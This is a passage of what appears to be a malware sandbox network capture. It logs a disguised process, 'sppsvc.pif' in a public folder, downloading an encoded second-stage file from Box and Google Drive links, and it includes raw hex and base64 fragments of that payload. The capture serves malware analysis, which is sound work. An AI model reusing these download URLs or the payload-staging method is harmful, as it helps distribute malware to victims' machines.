2024-04-24 06:40:07 UTC	2515	IN	HTTP/1.1 302 Found Date: Wed, 24 Apr 2024 06:40:07 GMT Content-Type: text/html; charset=utf-8 X-Robots-Tag: noindex, nofollow Strict-Transport-Security: max-age=31536000 Set-Cookie: z=t9lbvum88sinmop3p6emcthevd; path=/; domain=.app.box.com; secure; HttpOnly Set-Cookie: z=t9lbvum88sinmop3p6emcthevd; Path=/; Domain=.app.box.com; Secure; HttpOnly; SameSite=None Set-Cookie: box_visitor_id=6628a946d767c3.82823606; expires=Thu, 24-Apr-2025 06:40:06 GMT; Max-Age=31536000; path=/; domain=.box.com; secure; SameSite=None Set-Cookie: bv=ISF-13122; expires=Wed, 01-May-2024 06:40:06 GMT; Max-Age=604800; path=/; domain=.app.box.com; secure Set-Cookie: cn=47; expires=Thu, 24-Apr-2025 06:40:06 GMT; Max-Age=31536000; path=/; domain=.app.box.com; secure Set-Cookie: site_preference=desktop; path=/; domain=.box.com; secure Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://public.boxcloud.com/d/1/b1!XLo_Q0QmFWpqIy6-EXFQ9uv0OB_40zrbGjai9TcdxDKZbJbN56Wp7ifaYdZk88KhAWL73bNdMz9KaCrVvwKX0Su4zvaj7mW1FHJqJjxl3sfcF-bc1OmTF8kpZrS84e8a2C27k35yKaDpJp8vR8Uw6I00iViogD5h6EyILqfYd3FDItd43Oq97WjEvH6tiSTY6vmIREZJGxMxZeR655cof5hJ0JFbyuYCiKq1wRr6_fh3MkyXz6OTytLSUByoutEcQlpQxuXHlbV_8lquwjsfLn5YWMXnweyypB2YObL8ienhqGPcvOJCzFyxpoiAmwUj27ZUiyd36Zd4P3CRvHX6jQnRv5iN9GiTaSLSJPO-4u3-VB_8pZLFnTekxWXMSCL5lENOLhaegjQiJeVsGX7PM3jX1hKaH7e2kGCVqqHSLLX6H0ZayPi9GWBgWqbQp3pBu9jGZWHL4UHp2l6c_jkqMKAllFMM3Iv_dBkoNpOikeMk2Jg1XlufJ9aC4fsnjX6EqhHPkjkhiuCmSy8c434KrZiql8EG73hEu8YAbkeiFMIuEi65NeBnlQrm82ujfsBdWWQ2eFpiys1O5ZdmToudadswXQ2TbuM2ilvmsZOGXUf3NStV6obnKx1fPIzoj8ReXUyBb0ime0ItITmPbPnzialTI8LPoiHbIQ5aNaebRT8jMXMJlVSVmFOFBkK-33bgu-XiYmvt_Q920H6uFFohmX-fHn2C6iRLtBg_79TGIakTq4kaO_eY56e0s3xhFykDz9DiFRvDMu9Maxc8hLkzJl3KLV7d1brBO_ssrAr_kC_94aq6OXsNyp_2UEt0923KvZRqQD8efN0mgQF40ml0kle0vzgDSZoqOp1JFPY33T3Bb848hiqNlVhoSPFwYZgiYoPa_jQ7k3Oos1pfcJ3IDZFUG6ELh1ErPGZaUK0N2nqWnDqJPX9SnAXOmZE3g8TziaTtC-RGoFsPyMCdEBuCPaeWb7wcLWAdrU9AWiIY_ARHtKhQ4BjUixP9PJtlIoE4YpqzY5xpR3Hr8QoLV_vNLjHDJEoR4dj4njGdTgQlQx25va1TsBMyxmmPeaatyMaAtjo-e2PW0eo_Bj234qVnjRvrw1xilOMIN3SgT3NZJCZoFTLVEVy61i6q51hM7Dp_Qzz43uXSbWHULy1UeDIuHOzp5_zPIZgXIOiaXnhhyeJgJznw1KjcVTxqvuP5HEjGXE1U6l7guuTRUpaQZGdYaUKP3Vw4t_joSJYXGuc-2Cc9mea3nAhiG5mOq6PKd1K0_B3sbZESPTVNPpjTcjlh5WQN2BHQpHmhXJe8TxusY5zdpltOYK_BC8ChwrAUvjX3OlSq8ZumPjHGUqSW95I2ZcHYII5pPuoHPKadfCsJ-ks9FOOcFifEVclt/download Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close Transfer-Encoding: chunked
2024-04-24 06:40:07 UTC	12	IN	Data Raw: 37 0d 0a 31 31 31 38 33 34 34 0d 0a Data Ascii: 71118344
2024-04-24 06:40:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	74.112.186.128	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:08 UTC	1569	OUT	GET /d/1/b1!XLo_Q0QmFWpqIy6-EXFQ9uv0OB_40zrbGjai9TcdxDKZbJbN56Wp7ifaYdZk88KhAWL73bNdMz9KaCrVvwKX0Su4zvaj7mW1FHJqJjxl3sfcF-bc1OmTF8kpZrS84e8a2C27k35yKaDpJp8vR8Uw6I00iViogD5h6EyILqfYd3FDItd43Oq97WjEvH6tiSTY6vmIREZJGxMxZeR655cof5hJ0JFbyuYCiKq1wRr6_fh3MkyXz6OTytLSUByoutEcQlpQxuXHlbV_8lquwjsfLn5YWMXnweyypB2YObL8ienhqGPcvOJCzFyxpoiAmwUj27ZUiyd36Zd4P3CRvHX6jQnRv5iN9GiTaSLSJPO-4u3-VB_8pZLFnTekxWXMSCL5lENOLhaegjQiJeVsGX7PM3jX1hKaH7e2kGCVqqHSLLX6H0ZayPi9GWBgWqbQp3pBu9jGZWHL4UHp2l6c_jkqMKAllFMM3Iv_dBkoNpOikeMk2Jg1XlufJ9aC4fsnjX6EqhHPkjkhiuCmSy8c434KrZiql8EG73hEu8YAbkeiFMIuEi65NeBnlQrm82ujfsBdWWQ2eFpiys1O5ZdmToudadswXQ2TbuM2ilvmsZOGXUf3NStV6obnKx1fPIzoj8ReXUyBb0ime0ItITmPbPnzialTI8LPoiHbIQ5aNaebRT8jMXMJlVSVmFOFBkK-33bgu-XiYmvt_Q920H6uFFohmX-fHn2C6iRLtBg_79TGIakTq4kaO_eY56e0s3xhFykDz9DiFRvDMu9Maxc8hLkzJl3KLV7d1brBO_ssrAr_kC_94aq6OXsNyp_2UEt0923KvZRqQD8efN0mgQF40ml0kle0vzgDSZoqOp1JFPY33T3Bb848hiqNlVhoSPFwYZgiYoPa_jQ7k3Oos1pfcJ3IDZFUG6ELh1ErPGZaUK0N2nqWnDqJPX9SnAXOmZE3g8TziaTtC-RGoFsPyMCdEBuCPaeWb7wcLWAdrU9AWiIY_ARHtKhQ4BjUixP9PJtlIoE4YpqzY5xpR3Hr8QoLV_vNLjHDJEoR4dj4njGdTgQlQx25va1TsBMyxmmPeaatyMaAtjo-e2PW0eo_Bj234qVnjRvrw1xilOMIN3SgT3NZJCZoFTLVEVy61i6q51hM7Dp_Qzz43uXSbWHULy1UeDIuHOzp5_zPIZgXIOiaXnhhyeJgJznw1KjcVTxqvuP5HEjGXE1U6l7guuTRUpaQZGdYaUKP3Vw4t_joSJYXGuc-2Cc9mea3nAhiG5mOq6PKd1K0_B3sbZESPTVNPpjTcjlh5WQN2BHQpHmhXJe8TxusY5zdpltOYK_BC8ChwrAUvjX3OlSq8ZumPjHGUqSW95I2ZcHYII5pPuoHPKadfCsJ-ks9FOOcFifEVclt/download HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: public.boxcloud.com
2024-04-24 06:40:08 UTC	777	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 06:40:08 GMT Content-Type: application/octet-stream Content-Length: 1118344 set-cookie: b=38facd4abcc14446c055395f14d85bc35ff1a32ba8a7747f37db03dffe5a8aab; Path=/; Domain=.public.boxcloud.com; Secure; HttpOnly expires: Thu, 01 Jan 1970 00:00:00 GMT accept-ranges: bytes cache-control: private x-envoy-upstream-service-time: 110 content-disposition: attachment;filename="255_Mywiztwuaad";filename*=UTF-8''255_Mywiztwuaad x-robots-tag: noindex, nofollow encryption_policy_id: 0 x-content-type-options: nosniff X-Box-Original-Ingress-ADC-Host: prod-b-traffic-manager-5266 Strict-Transport-Security: max-age=31536000 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-24 06:40:08 UTC	478	IN	Data Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 7a 6b 37 4f 6a 67 32 4a 6a 6b 34 4e 43 63 35 4c 7a 41 30 4b 44 6b 71 4c 43 51 6b 4c 43 51 36 50 53 67 73 4f 54 51 77 4b 6a 41 77 4d 7a 67 79 4d 43 68 4c 53 55 70 47 59 56 59 63 46 30 4a 68 52 47 67 69 49 68 64 68 52 45 56 47 49 55 64 4c 53 55 6f 69 49 6b 52 68 52 55 52 57 57 45 56 45 51 6d 46 75 50 44 6f 73 50 54 63 36 4f 43 51 6b 4a 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 61 71 55 6e 70 57 54 6d 61 6d 55 6b 35 65 61 66 2f 46 58 31 43 41 30 4a 75 38 46 63 7a 71 67 2f 2f 31 66 6f 79 6f 59 41 45 55 4a 47 6d 75 Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLzk7Ojg2Jjk4NCc5LzA0KDkqLCQkLCQ6PSgsOTQwKjAwMzgyMChLSUpGYVYcF0JhRGgiIhdhREVGIUdLSUoiIkRhRURWWEVEQmFuPDosPTc6OCQkJ0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYaqUnpWTmamUk5eaf/FX1CA0Ju8Fczqg//1foyoYAEUJGmu
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 2f 6b 73 4a 64 66 47 66 5a 4c 57 2b 51 57 48 6e 41 2f 4a 54 44 55 39 58 30 33 61 67 41 73 41 62 48 77 56 37 44 5a 54 46 6f 65 4a 52 6f 48 56 2f 30 68 62 61 32 73 6d 46 52 38 46 65 6d 6b 70 46 4e 75 42 6c 70 5a 36 5a 64 46 72 31 2b 71 4b 5a 5a 57 30 6d 74 75 41 56 35 45 38 68 42 4c 43 43 46 4e 41 44 6a 64 58 6d 6f 45 54 30 7a 32 45 45 4e 62 49 41 68 6e 51 6d 37 38 61 45 31 69 41 6b 64 58 6d 66 6c 6f 44 42 64 59 61 69 7a 56 52 54 45 47 56 6b 2f 38 52 6b 34 78 4e 71 45 4c 50 42 36 76 70 78 31 43 33 78 34 4c 4e 31 4e 71 63 43 41 59 49 76 42 70 32 56 55 74 65 5a 55 31 31 53 79 51 52 42 68 4e 56 58 51 39 6c 5a 31 66 72 48 4f 46 52 57 2b 6d 39 49 4c 66 52 57 2b 5a 58 59 56 4c 38 51 65 43 65 74 58 56 61 65 6c 66 4b 35 77 32 5a 4e 68 49 6f 69 30 62 2f 4f 56 56 56 Data Ascii: /ksJdfGfZLW+QWHnA/JTDU9X03agAsAbHwV7DZTFoeJRoHV/0hba2smFR8FemkpFNuBlpZ6ZdFr1+qKZZW0mtuAV5E8hBLCCFNADjdXmoET0z2EENbIAhnQm78aE1iAkdXmfloDBdYaizVRTEGVk/8Rk4xNqELPB6vpx1C3x4LN1NqcCAYIvBp2VUteZU11SyQRBhNVXQ9lZ1frHOFRW+m9ILfRW+ZXYVL8QeCetXVaelfK5w2ZNhIoi0b/OVVV
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 70 57 54 6d 61 6d 55 6b 35 65 69 6c 4b 71 72 6c 36 4f 55 70 61 2b 6e 70 36 2b 6e 6c 61 43 6a 72 35 53 58 71 36 57 72 71 35 61 54 72 61 75 6a 71 70 53 65 6c 5a 4f 5a 71 5a 53 54 6c 36 4b 55 71 71 75 58 6f 35 53 6c 72 36 65 6e 72 36 65 56 6f 4b 4f 76 6c 4a 65 72 70 61 75 72 6c 70 4f 74 71 36 4f 71 6c 4a 36 56 6b 35 6d 70 6c 4a 4f 58 6f 70 53 71 71 35 65 6a 6c 4b 57 76 70 36 65 76 70 35 57 67 6f 36 2b 55 6c 36 75 6c 71 36 75 57 6b 36 32 72 6f 36 71 55 6e 70 57 54 6d 61 6d 55 6b 35 65 69 6c 4b 71 72 6c 36 4f 55 70 61 2b 6e 70 36 2b 6e 6c 61 43 6a 72 35 53 58 71 36 57 72 71 35 61 54 72 61 75 6a 71 70 53 65 6c 5a 4f 5a 71 5a 53 54 6c 36 4b 55 71 71 75 58 6f 35 53 6c 72 36 65 6e 72 36 65 56 6f 4b 4f 76 6c 4a 65 72 70 61 75 72 6c 70 4f 74 71 36 4f 71 6c 4a 36 56 Data Ascii: pWTmamUk5eilKqrl6OUpa+np6+nlaCjr5SXq6Wrq5aTraujqpSelZOZqZSTl6KUqquXo5Slr6enr6eVoKOvlJerpaurlpOtq6OqlJ6Vk5mplJOXopSqq5ejlKWvp6evp5Wgo6+Ul6ulq6uWk62ro6qUnpWTmamUk5eilKqrl6OUpa+np6+nlaCjr5SXq6Wrq5aTraujqpSelZOZqZSTl6KUqquXo5Slr6enr6eVoKOvlJerpaurlpOtq6OqlJ6V
2024-04-24 06:40:08 UTC	400	IN	Data Raw: 71 35 61 54 72 61 75 6a 71 70 53 65 6c 5a 4f 5a 71 5a 53 54 6c 36 4b 55 43 63 50 38 57 76 38 78 42 45 73 4d 39 41 79 64 38 70 38 46 6b 50 33 62 44 37 38 4a 4a 41 45 68 43 51 51 49 46 66 65 42 2b 74 30 51 77 50 70 4b 43 33 45 44 54 2f 37 38 2f 57 51 47 72 77 36 72 44 70 58 34 6e 77 65 73 2f 35 38 4e 79 78 48 31 2b 51 6f 4b 78 77 75 30 2f 30 6a 79 53 41 67 79 38 69 63 44 62 41 74 44 39 67 7a 31 2b 67 35 75 42 34 63 48 6a 51 42 33 44 34 54 33 35 77 58 6a 43 39 4c 7a 37 51 76 66 43 75 7a 2b 77 66 50 42 43 62 6a 7a 74 77 4c 51 43 72 50 33 74 2f 53 31 44 31 6f 48 56 67 63 74 41 44 63 50 4a 70 65 72 70 56 61 72 6f 52 53 74 71 36 4d 48 75 50 50 46 2f 6c 41 4d 4b 76 34 37 44 7a 6f 48 46 2f 6f 62 41 52 55 43 44 41 6f 4d 43 6d 54 31 61 67 49 56 2b 71 4d 51 72 77 61 Data Ascii: q5aTraujqpSelZOZqZSTl6KUCcP8Wv8xBEsM9Ayd8p8FkP3bD78JJAEhCQQIFfeB+t0QwPpKC3EDT/78/WQGrw6rDpX4nwes/58NyxH1+QoKxwu0/0jySAgy8icDbAtD9gz1+g5uB4cHjQB3D4T35wXjC9Lz7QvfCuz+wfPBCbjztwLQCrP3t/S1D1oHVgctADcPJperpVaroRStq6MHuPPF/lAMKv47DzoHF/obARUCDAoMCmT1agIV+qMQrwa
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 41 49 73 4b 36 77 53 32 2f 46 77 45 49 77 56 53 2b 57 54 38 6c 51 2b 73 2f 59 38 4d 37 41 53 7a 41 54 76 36 48 51 6b 51 45 57 59 43 72 66 32 48 43 70 44 79 63 77 68 37 44 74 37 32 37 51 37 66 44 38 54 37 54 50 59 74 42 47 7a 32 58 77 64 57 44 2f 54 79 2b 50 6d 78 43 71 38 43 72 77 4e 35 2f 49 4d 4c 6a 50 50 50 43 62 4d 50 4d 50 63 70 44 30 4d 4f 44 2f 6f 47 39 32 67 46 49 66 63 55 42 71 41 4f 72 2f 53 54 39 34 30 4d 67 77 53 50 42 49 33 37 63 77 7a 63 39 4e 38 47 78 78 44 4f 2b 4c 30 51 58 68 46 4c 2f 55 54 34 4d 51 49 6d 2b 47 6b 4a 61 42 45 62 39 45 76 33 45 67 77 51 42 41 77 45 48 76 74 6d 44 62 44 31 68 77 66 54 45 65 62 35 30 52 47 33 45 44 62 38 61 2f 6c 5a 41 2f 2f 35 6e 77 69 55 43 35 2f 32 68 2f 58 56 44 73 38 47 73 77 5a 51 41 52 73 4f 5a 50 5a Data Ascii: AIsK6wS2/FwEIwVS+WT8lQ+s/Y8M7ASzATv6HQkQEWYCrf2HCpDycwh7Dt727Q7fD8T7TPYtBGz2XwdWD/Ty+PmxCq8CrwN5/IMLjPPPCbMPMPcpD0MOD/oG92gFIfcUBqAOr/ST940MgwSPBI37cwzc9N8GxxDO+L0QXhFL/UT4MQIm+GkJaBEb9Ev3EgwQBAwEHvtmDbD1hwfTEeb50RG3EDb8a/lZA//5nwiUC5/2h/XVDs8GswZQARsOZPZ
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 2f 42 7a 38 48 50 51 41 6a 44 32 7a 33 47 77 56 44 43 31 6a 7a 41 67 73 45 43 67 76 2b 5a 50 4d 69 43 52 58 7a 6e 77 4b 55 44 5a 50 34 6b 2f 4f 4e 45 49 63 49 64 77 69 46 2f 2b 73 51 31 50 6a 54 41 74 73 4d 76 76 54 4e 44 4c 73 4e 78 41 46 4d 39 45 67 47 4c 76 51 6e 42 54 34 4e 4b 2f 67 62 38 78 55 51 54 77 68 50 43 50 72 2f 42 42 41 4c 2b 42 77 43 59 67 77 58 39 4b 55 4d 6f 36 71 55 6e 6f 47 54 6e 32 69 55 56 4b 39 44 70 45 75 44 57 49 4e 52 66 56 42 33 53 4f 64 49 31 56 33 62 55 4f 52 59 77 30 4c 4c 54 4d 35 55 76 55 78 61 53 30 4e 66 4c 56 51 70 52 6a 35 55 4e 30 4e 73 53 78 74 59 53 31 45 53 55 42 42 49 45 45 67 4b 58 52 52 51 48 56 68 71 51 71 4e 4d 6c 76 36 56 42 70 4d 48 66 50 4e 31 2f 70 45 4d 68 50 37 66 44 39 51 48 30 2f 72 54 41 63 30 43 78 77 Data Ascii: /Bz8HPQAjD2z3GwVDC1jzAgsECgv+ZPMiCRXznwKUDZP4k/ONEIcIdwiF/+sQ1PjTAtsMvvTNDLsNxAFM9EgGLvQnBT4NK/gb8xUQTwhPCPr/BBAL+BwCYgwX9KUMo6qUnoGTn2iUVK9DpEuDWINRfVB3SOdI1V3bUORYw0LLTM5UvUxaS0NfLVQpRj5UN0NsSxtYS1ESUBBIEEgKXRRQHVhqQqNMlv6VBpMHfPN1/pEMhP7fD9QH0/rTAc0Cxw
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 57 6f 44 59 50 34 66 2f 4e 31 45 4f 4d 49 31 77 6a 42 2f 38 4d 51 79 50 68 53 41 6a 63 4d 4b 50 51 78 44 42 73 4e 58 67 46 52 39 50 49 47 43 2f 51 63 42 52 55 4e 72 35 65 6a 6c 7a 32 76 73 61 65 76 70 35 56 64 6d 31 43 41 57 49 74 43 66 30 7a 65 56 4e 6c 4d 30 30 75 34 58 38 31 55 54 45 5a 44 56 43 4e 44 50 6b 73 58 57 42 4e 52 52 56 41 51 53 50 52 49 5a 50 7a 58 43 2b 54 7a 78 77 6e 44 45 46 4c 34 53 78 41 4f 45 66 32 65 6c 5a 4e 56 71 5a 6d 6a 6c 36 4b 55 43 64 66 38 32 2f 2f 5a 42 4e 63 4d 77 77 79 39 38 38 63 45 74 50 79 33 44 72 4d 49 77 67 43 39 43 46 34 4a 53 2f 56 49 41 45 67 4b 4d 67 41 76 45 53 6f 4a 4f 2f 77 72 2f 79 6b 45 4a 77 77 54 44 47 76 7a 46 77 52 6b 2f 45 63 4f 51 77 68 55 41 45 6b 49 45 41 6e 37 39 66 59 41 39 67 6f 50 41 42 41 52 42 Data Ascii: WoDYP4f/N1EOMI1wjB/8MQyPhSAjcMKPQxDBsNXgFR9PIGC/QcBRUNr5ejlz2vsaevp5Vdm1CAWItCf0zeVNlM00u4X81UTEZDVCNDPksXWBNRRVAQSPRIZPzXC+TzxwnDEFL4SxAOEf2elZNVqZmjl6KUCdf82//ZBNcMwwy988cEtPy3DrMIwgC9CF4JS/VIAEgKMgAvESoJO/wr/ykEJwwTDGvzFwRk/EcOQwhUAEkIEAn79fYA9goPABARB
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 50 35 5a 38 31 55 4a 2b 2f 50 34 41 67 73 4b 48 50 64 71 39 47 51 50 72 77 65 76 43 4b 33 2f 6b 78 42 38 2b 49 73 43 63 77 79 47 39 4f 55 4d 34 77 33 73 41 65 58 30 77 51 61 30 39 4d 38 46 78 41 31 53 2b 46 4c 7a 50 52 41 33 43 43 63 49 4e 66 38 62 45 47 54 34 51 77 4a 4c 44 41 48 30 43 67 7a 38 44 57 4d 42 48 76 51 61 42 70 7a 30 6c 36 4b 55 71 7a 65 58 70 75 53 6c 55 4a 39 49 6e 30 68 39 58 59 4e 51 6a 46 68 37 51 75 4e 4d 31 6c 54 56 54 4e 4e 4c 76 46 2b 31 56 4e 46 47 78 46 52 4f 51 30 4e 4c 4d 31 67 7a 55 53 31 51 4a 30 67 58 53 47 4e 64 53 31 42 53 57 41 52 43 44 45 77 52 56 42 35 4d 61 6b 73 56 58 35 31 55 6d 51 79 73 2f 71 63 50 66 41 65 4c 2b 6e 73 42 64 51 4c 76 43 75 38 4b 37 66 58 54 41 72 7a 36 7a 78 43 33 42 73 4c 2b 57 41 5a 57 42 7a 4c 7a Data Ascii: P5Z81UJ+/P4AgsKHPdq9GQPrwevCK3/kxB8+IsCcwyG9OUM4w3sAeX0wQa09M8FxA1S+FLzPRA3CCcINf8bEGT4QwJLDAH0Cgz8DWMBHvQaBpz0l6KUqzeXpuSlUJ9In0h9XYNQjFh7QuNM1lTVTNNLvF+1VNFGxFROQ0NLM1gzUS1QJ0gXSGNdS1BSWARCDEwRVB5MaksVX51UmQys/qcPfAeL+nsBdQLvCu8K7fXTArz6zxC3BsL+WAZWBzLz
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 39 41 55 46 2f 52 34 46 62 67 51 64 2b 42 72 32 73 51 53 6f 39 71 63 48 6b 41 39 7a 38 6e 66 35 64 51 72 72 41 75 63 43 32 66 33 6a 43 6c 4c 79 43 41 67 45 44 67 58 32 48 67 35 75 44 78 33 37 47 76 59 61 42 4b 44 32 6e 77 61 77 44 70 50 7a 6c 2f 69 56 43 34 73 44 68 77 4e 35 2f 49 4d 4c 6b 50 4e 7a 43 58 38 50 68 76 66 70 44 2b 73 4f 32 50 72 56 39 2b 30 46 37 50 66 6a 42 75 51 4f 78 2f 50 4c 2b 4d 6b 4c 78 77 4f 7a 41 38 33 38 74 77 76 45 38 31 59 4a 55 67 38 53 39 31 77 50 50 77 34 75 2b 69 6e 33 4b 51 56 78 39 7a 38 47 4f 67 34 72 38 78 2f 34 48 51 73 54 41 78 38 44 58 66 78 4c 43 31 62 7a 53 77 6b 49 44 77 48 33 44 67 38 45 44 67 2f 36 43 76 63 43 42 57 50 33 48 41 59 64 44 6d 37 7a 59 76 69 78 43 36 38 44 71 77 53 78 6f 4b 4f 75 4a 70 65 75 74 61 73 Data Ascii: 9AUF/R4FbgQd+Br2sQSo9qcHkA9z8nf5dQrrAucC2f3jClLyCAgEDgX2Hg5uDx37GvYaBKD2nwawDpPzl/iVC4sDhwN5/IMLkPNzCX8PhvfpD+sO2PrV9+0F7PfjBuQOx/PL+MkLxwOzA838twvE81YJUg8S91wPPw4u+in3KQVx9z8GOg4r8x/4HQsTAx8DXfxLC1bzSwkIDwH3Dg8EDg/6CvcCBWP3HAYdDm7zYvixC68DqwSxoKOuJpeutas
2024-04-24 06:40:08 UTC	1255	IN	Data Raw: 4f 6c 76 69 53 42 33 50 2f 35 67 31 69 44 76 6a 33 6e 51 2b 46 44 75 44 36 37 2f 66 42 42 63 72 33 51 67 59 6f 44 69 76 7a 54 66 67 4f 43 2f 34 44 5a 67 53 4a 2b 2b 4d 4d 4a 76 51 71 42 76 59 51 48 2f 6d 44 45 59 45 51 76 2f 79 7a 2b 54 6b 44 55 66 6e 7a 43 41 55 4c 6b 2f 61 55 39 59 30 4f 30 51 62 51 42 6a 77 42 56 41 37 37 39 67 73 45 6f 77 71 57 38 34 34 4c 64 67 72 61 2f 6b 72 7a 50 61 6d 55 6b 79 75 69 6d 61 71 72 57 42 64 52 2b 41 4b 65 43 6f 67 4b 67 76 58 74 41 6c 76 37 59 42 45 6f 42 7a 72 2f 49 41 64 48 42 70 66 31 71 77 43 6d 43 6e 77 41 64 68 45 36 43 52 72 38 45 66 39 6f 42 5a 55 4e 36 41 33 47 38 6a 51 46 4e 76 30 56 44 31 77 43 4a 76 6f 63 42 44 73 46 46 2f 68 6e 2f 56 4d 50 39 76 30 4e 44 43 49 50 64 66 4c 71 2b 64 67 4b 78 41 49 46 41 34 Data Ascii: OlviSB3P/5g1iDvj3nQ+FDuD67/fBBcr3QgYoDivzTfgOC/4DZgSJ++MMJvQqBvYQH/mDEYEQv/yz+TkDUfnzCAULk/aU9Y0O0QbQBjwBVA779gsEowqW844Ldgra/krzPamUkyuimaqrWBdR+AKeCogKgvXtAlv7YBEoBzr/IAdHBpf1qwCmCnwAdhE6CRr8Ef9oBZUN6A3G8jQFNv0VD1wCJvocBDsFF/hn/VMP9v0NDCIPdfLq+dgKxAIFA4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	142.250.101.102	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:10 UTC	205	OUT	GET /uc?export=download&id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.google.com
2024-04-24 06:40:10 UTC	1317	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 24 Apr 2024 06:40:10 GMT Location: https://drive.usercontent.google.com/download?id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-wSpmRWMhpGhqd9kyViGElw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49737	142.250.101.132	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:11 UTC	223	OUT	GET /download?id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6&export=download HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.usercontent.google.com
2024-04-24 06:40:13 UTC	4748	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPrQbvVL7afRzW2abDg7wqhVjR-Qf4VqFKPbBItRiC6N2RNrxQu2hV4T0XGjLtRp6etdffg Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="255_Mywiztwuaad" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, 